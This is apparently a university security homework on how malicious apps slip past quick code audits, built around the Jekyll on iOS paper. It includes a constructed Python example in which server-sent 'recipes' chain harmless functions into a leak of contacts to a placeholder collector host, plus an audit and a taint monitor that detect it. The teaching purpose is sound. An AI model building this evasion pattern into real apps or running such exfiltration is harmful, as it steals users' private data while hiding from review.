Homework 3 - Case Study on Bypassing Simple Code Audits
This is the final case study of the quarter. It is due on the last day of
classes: Tuesday June 9th, just before midnight.
The purpose of this case study is to look at how a malicious programmer might
try to bypass simple code audits. Bypassing such an audit could, for example,
let a malicious app be approved for the Apple, Google (Android), or Microsoft
Windows app stores.
Before You Begin Reading The References
Write 1 to 2 paragraphs summarizing how you think a malicious programmer might
bypass simple (i.e. quick) code audits. Use the techniques learned in class to
theorize how this might occur.
The References
Read the following scholarly references on bypassing simple code audits and on
techniques for detecting malicious apps that can be used alongside simple code
audits to provide more complete coverage:
- T. Wang, K. Lu, L. Lu, S. Chung and W. Lee, "Jekyll on iOS: When Benign
Apps Become Evil", Proceedings of the 22nd USENIX Security Symposium,
Washington, D.C., USA, August 14-16, 2013 [online: presentation slides and
paper]
- M. Ernst, R. Just, et al., "Collaborative Verification of Information Flow
for a High-Assurance App Store", Proceedings of the 2014 ACM SIGSAC
Conference on Computer and Communications Security (CCS'14), Scottsdale, AZ,
USA, November 2014 [online: ACM Digital Library; PDF download available
on-campus]
- Y. Zhou, Z. Wang, W. Zhou, and X. Jiang, "Hey, You, Get Off of My Market:
Detecting Malicious Apps in Official and Alternative Android Markets",
Proceedings of the 19th Annual Network and Distributed System Security
Symposium (NDSS 2012), San Diego, CA, USA, February 2012 [online: paper]
- A. Armando, G. Costa, L. Verderame, and A. Merlo, "Securing the 'Bring Your
Own Device' Paradigm", IEEE Computer, Volume 47, Issue 6, June 2014,
pp. 48-56 [online: IEEE Xplore; PDF download available on-campus]
The Writeup
Turn in a writeup to Moodle that contains the following:
- Your 1-2 paragraphs that you wrote before reading the references
- A 1-2 paragraph summary of each of the four references
- Your responses to the following questions:
- Why is simple source code auditing ineffective at detecting malware?
When answering, consider the techniques that the Jekyll app used to pass
Apple's App Store review: the submitted app contained only benign-looking
code plus deliberately planted vulnerabilities, and the malicious logic was
assembled at run time by exploiting those vulnerabilities after approval.
(Apple reviews the submitted binary rather than source code, but a reviewer
reading source faces the same limitation.)
- How do the additional techniques presented in the above references
differ from source code auditing?
- What might a malicious programmer try to do in order to bypass the
additional techniques?
- A 1-2 paragraph summary of why you think detecting malicious apps is
difficult.
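The following is an added illustration of the Jekyll-style bypass behind the first question; it is constructed for this page and is not code from the assignment or from the Jekyll paper. Every primitive in the toy app is benign on its own and has a plausible legitimate use; the contacts-to-network leak exists only as an ordering of those primitives chosen at run time by data the reviewer never sees. A real Jekyll app hides that ordering behind a planted memory-safety bug and a ROP-style chain, which a visible dispatch table stands in for here. The address book, the server "recipe" and the collector URL are all made-up sample data, and the two checks (a quick per-function audit and a run-time information-flow monitor) are simplified stand-ins for the review and verification techniques the references discuss.

```python
"""Constructed Jekyll-style example: benign primitives, malicious ordering."""

# Constructed sample data standing in for the device's address book.
ADDRESS_BOOK = ["alice@example.com", "bob@example.com"]

# Stands in for the network so a test can observe what leaves the app.
OUTBOUND = []


def read_contacts():
    """Legitimately used by the 'invite a friend' screen."""
    return list(ADDRESS_BOOK)


def make_invite(name):
    """Formats a single invitation message."""
    return "Join me on the app, %s!" % name


def http_post(url, body):
    """Legitimately used for crash reports and telemetry."""
    OUTBOUND.append((url, body))
    return 200


# To a quick reader this looks like a harmless telemetry/command protocol.
HANDLERS = {"contacts": read_contacts, "invite": make_invite, "post": http_post}


def run_commands(commands, handlers=HANDLERS):
    """Run server-supplied steps; a '$name' argument refers to an earlier result."""
    results = {}
    for step in commands:
        args = [results[a[1:]] if isinstance(a, str) and a.startswith("$") else a
                for a in step.get("args", [])]
        results[step["out"]] = handlers[step["op"]](*args)
    return results


# --- what a simple audit sees -------------------------------------------

def quick_audit(functions, source="read_contacts", sink="http_post"):
    """Flag any function that references both the sensitive source and the
    network sink.  Uses each function's global-name table, i.e. the
    per-function view a reviewer forms by reading one function at a time."""
    flagged = []
    for fn in functions:
        names = set(fn.__code__.co_names)
        if source in names and sink in names:
            flagged.append(fn.__name__)
    return flagged


# --- what a run-time information-flow check sees ------------------------

def monitored_run(commands, sources=("contacts",), sinks=("post",)):
    """Execute the same steps with source results tainted and sink arguments
    checked.  Taint is tracked by object identity here; real tools also
    follow values derived from a tainted one."""
    tainted = set()
    violations = []

    def wrap(name, fn):
        def wrapped(*args):
            if name in sinks:
                for a in args:
                    if id(a) in tainted:
                        violations.append((name, args[0]))
            ret = fn(*args)
            if name in sources:
                tainted.add(id(ret))
            return ret
        return wrapped

    handlers = {k: wrap(k, v) for k, v in HANDLERS.items()}
    run_commands(commands, handlers)
    return violations


# Constructed recipes.  The benign one is what the server sends during review;
# the exfiltration one is sent only after the app has been approved.
BENIGN_RECIPE = [
    {"op": "invite", "args": ["alice"], "out": "m"},
    {"op": "post", "args": ["https://app.invalid/telemetry", "$m"], "out": "r"},
]
EXFIL_RECIPE = [
    {"op": "contacts", "out": "c"},
    {"op": "post", "args": ["https://collector.invalid/upload", "$c"], "out": "r"},
]

if __name__ == "__main__":
    print("quick audit flags:",
          quick_audit([read_contacts, make_invite, http_post, run_commands]))
    print("flow monitor, benign recipe:", monitored_run(BENIGN_RECIPE))
    print("flow monitor, exfil recipe:", monitored_run(EXFIL_RECIPE))
```

The quick audit finds nothing because no single function both reads contacts and talks to the network, which is the view a reviewer gets from reading the code. The monitor only reports a leak when the post-approval recipe is actually executed, which is why the additional techniques in the references rely on information-flow reasoning or run-time observation rather than on reading code alone, and why an attacker's next move is to make sure the malicious ordering never runs while the app is being observed.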